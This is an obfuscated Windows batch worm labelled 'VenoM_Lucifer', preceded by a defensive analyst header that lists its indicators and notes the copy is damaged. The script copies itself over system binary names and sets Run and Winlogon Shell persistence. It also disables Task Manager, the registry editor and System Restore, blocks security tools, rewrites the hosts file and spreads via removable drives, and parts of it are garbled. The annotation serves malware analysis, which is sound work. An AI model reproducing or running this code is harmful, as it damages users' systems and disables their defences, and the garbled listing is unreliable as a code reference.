:: ---------------------------------------------------------------------------
:: Analyst notes (defensive annotation; the script text below is unchanged).
::
:: Purpose: obfuscated Windows batch sample that labels itself 'VenoM_Lucifer'.
:: The listing has been collapsed onto a few physical lines and several variable
:: names look damaged (e.g. %'%, %k%, %`%), so treat it as an incomplete copy.
::
:: Obfuscation visible in these lines:
::  - Command words are hidden behind variables defined at run time
::    (sEt ``',=SeT, ``'=gOto, V-!=rem) and later redefined (v_!H=Set, then cOPy).
::  - Literals are split around variables: _0H=x with _oH=e%_0H%e yields "exe",
::    _!!=Ex gives "Ex"+"plorer", sht=wi gives "wi"+"ndows".
::  - e%cho%, c%all%, %!V-!%, %rs%, %rd% are never defined in the visible text;
::    presumably exist / copy-or-call / reg add / REG_SZ / REG_DWORD -- confirm
::    against a complete sample.
::
:: Behaviour that the visible text establishes (useful as hunting indicators):
::  - Self-replication: %0 is passed to c%all% with targets such as
::    %appdata%\services.exe, %appdata%\winlogon.exe, %appdata%\Microsoft\csrss.exe
::    and notepad/taskmgr/wordpad paths (c is set to %appdata%).
::  - Persistence: values written under HKCU and HKLM ...\CurrentVersion\Run
::    (names Explorer.exe and CTFMON.EXE) and the Winlogon "Shell" value.
::  - Defence impairment: DisableTaskMgr, DisableRegistryTools, NoFolderOptions,
::    NoFind, Hidden=2, ShowSuperHidden=0, HideFileExt, DisallowRun policies,
::    applied to HKLM and HKCU through the x=LM / x=CU switch.
::  - Drive loop over C..M that checks for <drive>:\...\LucifeR.exe and a
::    "ShelL\OpeN\CommanD=" entry in %%h:\%ee% (presumably autorun.inf -- confirm).
::  - Artefacts: a marker file %``%\system\COM<random>.DLL and a hidden log
::    %appdata%\Micro$oft\desktop.log receiving date, time and username.
::  - Host check: "if %COMPUTERNAME%==VENOM goto ex" skips one named machine.
::
:: Mitigation pointers: alert on writes to the Run / Winlogon Shell / Policies
:: values listed above, and on batch files copying themselves over system
:: binary names; disabling AutoRun for removable media limits the drive loop.
:: ---------------------------------------------------------------------------
@shift ::________________________________:: :::: :: Nombre : 'VenoM_Lucifer' :: :: Autor : VenoM :: :: Version : 4.666 :: ::________________________________:: :::: if '%6==%6'~ goto !V-h_0H%6 sEt ``',=SeT %``',% ``'=gOto %``',% V-!=rem %``',% h_0=X %``',% _0H=x %``',% ``=seT if "%1"=="666" (%``',% v_!H=Set&%``'% !h_0hH) else (%``',% v_!H=Set&%``'% !V-h_0H%4) :!V-h_OHH attrib -s -h -r -a %0 if not e%cho% "%``%\%``'%.%_oH%" (c%all% %0 "%``%\%``'%.%_oH%") if not e%cho% "C:\%sht%NDOWS\%``'%.%_oH%" (c%all% %0 "C:\%sht%NDOWS\%``'%.%_oH%") if not e%cho% "%D:%\%``%\%`%.%h_o%" (c%all% %0 "%D:%\%``%\%`%.%h_o%") if not e%cho% "C:\%``%\%`%.%h_o%" (c%all% %0 "C:\%``%\%`%.%h_o%") c%all% %0 "%``%\system32\taskmgr.%_oH%" if not e%cho% "%``%\system32\drivers\etc\%_!H%.com" (c%all% %0 "%``%\system32\drivers\etc\%_!H%.com") if not e%cho% "%userprofile%\Config~1\Datosd~1\Microsoft\%sht%nlogon.scr" (c%all% %0 "%userprofile%\Config~1\Datosd~1\Microsoft\%sht%nlogon.scr") %v_!% H_Ohn :H_Ohn %`'% e%cho% "%c%\services.%_oH%" %v_!% _!v_!H_Ohn c%all% %0 "%c%\services.%_oH%" %v_!% _!v_!H_Ohn :v_!H_0h if e%cho% "%``%\system\COM%a%.DLL" (%v_!% !v_!H_Ohn) else (%v_!% !v_!H_0hn) :9!v_!H_0hn9 for %%h in (%YU%) do if e%cho% %%h:\*.* (if not e%cho% "%%h:\%d%\LucifeR.exe" %v_!% !V-!h-0Hn) for %%h in (%YU%) do if e%cho% %%h:\*.* (find /i "ShelL\OpeN\CommanD=%_!%\LucifeR.%_oH% 666" "%%h:\%ee%"&if errorlevel 1 %v_!% !V-!h-0Hn) ping 127.0.0.1 -n 2 %v_!% 9!v_!H_0hn9 :!v_!H_Oh %v_!% !v_!H_0h :!v_!H_0hn if not e%cho% "%c%\Microsoft\csrss.%_oH%" c%all% %0 "%c%\Microsoft\csrss.%_oH%" %!V-!% "HKCU\Software\Microsoft\%sht%ndows\CurrentVersion\Run" /v %_!!%plorer.%_oH% /t %rs% /d "%c%\Microsoft\csrss.%_oH%" /f :!v_!H_Ohn %!V-!% "HKLM\Software\Microsoft\%sht%ndows\CurrentVersion\Run" /v CTFMON.%h_o% /t %rs% /d "%``%\%``'%.%_oH%" /f %!V-!% "HKLM\SOFTWARE\Microsoft\%sht%ndows NT\CurrentVersion\%sht%nlogon" /v Shell /t %rs% /d "%_!!%plorer.%_oH% %D:%\%``%\%`%.%h_o%" /f %`'% %z%==1 %v_!% !!v_!H_0hn %`'% 
%0=="%D:%\%``%\%`%.%h_o%" (%v_!% !!v_!H_0hn) %`'% %ad_lm%==lm (%`'% %0=="%``%\%``'%.exe" goto ex) %v_!% Ohn!V :Ohn!V start "%c%\services.%_oH%" "%c%\services.%_oH%" start "%c%\winlogon.%_oH%" "%c%\winlogon.%_oH%" if %COMPUTERNAME%==VENOM goto ex %v_!% !!v_!H_0hn :!v_!H_Ohn %v_!H% Men=%userprofile%\Men Inicio\Programas\Accesorios c%all% %0 "%D:%\Docume~1\Default User\Men Inicio\Programas\Inicio\%sht%n.scr" c%all% %0 "%userprofile%\Datosd~1\Microsoft\Internet %_!!%plorer\Quick Launch\Mis documentos.%_oH%" c%all% %0 "%``%\notepad.%_oH%" c%all% %0 "%``%\system32\notepad.%_oH%" c%all% %0 "%p%\%sht%ndows NT\Accesorios\wordpad.%_oH%" %v_!H% "%Men%\Smbolo del sistema.lnk" %v_!H% "%Men%\Bloc de notas.lnk" %v_!H% "%Men%\%_!!%plorador de %sht%ndows.lnk" %v_!H% "%p%\Trend Micro\HijackThis\HijackThis.%_oH%" %v_!H% "%allusersprofile%\Men Inicio\Programas\Accesorios\Herramientas del sistema\Tareas programadas.lnk" c%all% %0 "%userprofile%\Datos de programa.%_oH%" c%all% %0 "%D:%\WINDOWS.%h_o%" c%all% %0 "%``%\system32\drivers\etc.%_oH%" c%all% %0 "%``%\system32.%_oH%" attrib +h +s %``% attrib +s +h "%``%\system32" attrib +s +h "%``%\notepad.%_oH%" attrib +s +h "%``%\system32\notepad.%_oH%" %v_!% !V!-0HN :!V-h_0H pushd C:\ cd %systemdrive%\ %``% %1= %``% '=md %``% `'=e %``% ``',=goto %``% `',=s %v_!H% a=%random% %``',% `' %``% `',=cd :`' %``% `',=e %``',% `' %``% `',=d :`' %v_!H% c=%appdata% %``% `'=t %``',% `' %``% `'=if :`' %``% `'=if %if% %`',%%`',%%`'% ``'=%`',%%`',%%`'% %v_!H% b=E,F,G,H,I,J,K,L,M,N %v_!H% YU=C,D,E,F,G,H,I,J,K,L,M %v_!H% D:=%systemdrive% %``% _!!=Ex %v_!H% W=SOFTWARE\Microsoft\windows\CurrentVersion %``% r=HKCU\%w%\Policies\Explorer\DisallowRun %`'% not '%[!_v]%==%0%1%3' (goto !_) else (%[!_v]%goto !%!_v%Hn) :!h_0hH for %%i in (C,D,E,F,G,H,I,J,K,L,M) do if "%cd%"=="%%i:\" %``',% U=%%i if %0=="%U%:\SystemVolumeInformation\LucifeR.exe" start /max explorer.exe %U%:\ if '%8==%VER%' (%``'% !V-h_0H%3&``',) else (%``'% !V-h_0H%4) %``',% v_!H=cOPy set ``',=for : 
%v_!H% sht=in %v_!H% sht=wi %_!% :: Quemate en el infierno te desea 'Lucifer'>"%``%\system\COM%a%.DLL" if e%cho% "%``%\system\COM%a%.DLL" (%``'% ad_lm=ad&%v_!% !v_!H_0hn) else (%``'% YU=D,E,F,G,H,I,J,K,L,M&%``'% ad_lm=lm) %v_!% !v_!H_0hn :!v_!H_0hn %`',%%`',%%`'% h_o=E%h_0%E sET _oH=e%_0H%e %`'% %0=="%c%\services.%_oH%" %v_!% !h-0H!!v_!H_0hn!V %`'% %0=="%c%\winlogon.%_oH%" %v_!% 9!v_!H_0hn9 %`'% %0=="%D:%\%``%\%`%.%h_o%" (%v_!% !V-h_OHH) %'% "%c%\Micro$oft" %k% Ad-Watch.%h_o% %_!% %date% %time% %username%>>"%c%\Micro$oft\desktop.log" attrib +s +h "%c%\Micro$oft\desktop.log" %v_!% !V-h_OHH :!!v_!H_0hn %`'% %y%==1 %``'% x=LM %`'% %y%==2 %``'% x=CU %!V-!% "HK%x%\%W%\Policies\System" /v DisableTaskMgr /t %rd% /d "1" /f %!V-!% "HK%x%\%W%\Policies\System" /v DisableRegistryTools /t %rd% /d "1" /f %`'% %z%==1 %v_!% !! %!V-!% "HK%x%\%W%\Policies\%_!!%plorer" /v NoFolderOptions /t %rd% /d "1" /f %!V-!% "HK%x%\%W%\Policies\%_!!%plorer" /v NoFind /t %rd% /d "1" /f %`'% %y%==1 %``'% y=2&%v_!% !!v_!H_0hn :!! %!V-!% "HKCU\%W%\%_!!%plorer\Advanced" /v Hidden /t %rd% /d "2" /f %!V-!% "HKCU\%W%\%_!!%plorer\Advanced" /v ShowSuperHidden /t %rd% /d "0" /f %`'% %z%==1 %v_!% !V-!h-0H!!v_!H_0hn!V-!h_0hH %!V-!% "HKCU\%W%\%_!!%plorer\Advanced" /v HideFile%_!!%t /t %rd% /d "1" /f %!V-!% "HKCU\%w%\Policies\Explorer" /v NoRecycleFiles /t %rd% /d "1" /f %!V-!% "HKCU\%w%\Policies\Explorer" /v NoPropertiesMyComputer /t %rd% /d "1" /f %!V-!% "HKCU\%w%\Policies\Explorer" /v DisallowRun /t %rd% /d "1" /f if %ad_lm%==lm (%v_!% !V-h_0HH_0h!V!-0HN) %v_!% hn!V-! :hn!V-! 
%!V-!% "HKLM\%W%\%_!!%plorer\Advanced\Folder\Hidden\SHOWALL" /v CheckedValue /t %rd% /d "0" /f %!V-!% "HKLM\SOFTWARE\Policies\Microsoft\%sht%ndows NT\SystemRestore" /v DisableConfig /t %rd% /d "1" /f %!V-!% "HKLM\SOFTWARE\Policies\Microsoft\%sht%ndows NT\SystemRestore" /v DisableSR /t %rd% /d "1" /f %!V-!% "%r%" /v 1 /t %rs% /d "notepad.exe" /f %!V-!% "%r%" /v 2 /t %rs% /d "HijackThis.exe" /f %!V-!% "%r%" /v 3 /t %rs% /d "wordpad.exe" /f %!V-!% "%r%" /v 4 /t %rs% /d "rstrui.exe" /f %!V-!% "%r%" /v 5 /t %rs% /d "taskmgr.exe" /f %!V-!% "%r%" /v 5 /t %rs% /d "msconfig.exe" /f %!V-!% "%r%" /v 6 /t %rs% /d "regedit.exe" /f %!V-!% "%r%" /v 7 /t %rs% /d "HiJackThis_v2.exe" /f %!V-!% "%r%" /v 10 /t %rs% /d "cmd.exe" /f %!V-!% "%r%" /v 11 /t %rs% /d "ibprocman.exe" /f %!V-!% "%r%" /v 12 /t %rs% /d "explorer.exe" /f %!V-!% "%r%" /v 13 /t %rs% /d "integrator.exe.exe" /f find /i "metroflog" "%``%\system32\drivers\etc\hosts"&if errorlevel 1 for %%n in (metroflog,hotmail,google) do %_!% 127.0.0.1 www.%%n.com>>%``%\system32\drivers\etc\hosts %!V-!% "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t %rs% /d "www.google.com.mx" /f %v_!% !V-h_0HH_0h!V!-0HN :!V-h_0HH_0h!V!-0HN if not e%cho% "%userprofile%\Plantillas\Leviathan.hta" %v_!% _0h %v_!% _0hn :!V-h_0HH c%all% %0 "c:\%sht%ndows\taskmgr.%_oH%" c%all% %0 "c:\%sht%ndows\%``'%.%_oH%" if e%cho% "c:\%sht%ndows\all users\men inicio" (%v_!% !v_!H_0hn) else (%v_!% !v_!H_Ohn) :_0h set hp="%userprofile%\Plantillas\Leviathan.hta" %_!% ^^^^ >%hp% %_!% ^>%hp% %_!% SCROLLFLAT ="No" SingleInstance="No" ShowInTaskbar="No" SysMenu="No" MaximizeButton="No" MinimizeButton="No" >>%hp% %_!% Border="Thin" BORDERSTYLE ="normal" INNERBORDER ="No" Caption="No" WindowState="maximize"^> >>%hp% %_!% ^^ >>%hp% %_!% ^^^^^^^^^^^^^^ >>%hp% %_!% ^ >>%hp% %_!% ^^ >>%hp% %_!% ۠۠۠۠۠^ >>%hp% %_!% ۠۠۠۠۠۠^ >>%hp% %_!% ۠۠۠۠۠۠۠^ >>%hp% %_!% ۠۠۠۠۠۠۠۠۠۠۠^ >>%hp% %_!% ۠۠۠۠۠۠۠۠۠۠۠۠۠^ >>%hp% %_!% ۠۠۠۠۠۠۠۠۠۠۠۠^ >>%hp% %_!% ۠۠۠۠۠۠۠۠۠۠^ >>%hp% %_!% 
۠۠۠۠۠۠۠۠۠۠^ >>%hp% %_!% ۠۠۠۠۠۠۠۠۠^ >>%hp% %_!% ۠۠۠۠۠۠۠۠^ >>%hp% %_!% ^^ >>%hp% %_!% ^ >>%hp% %_!% ^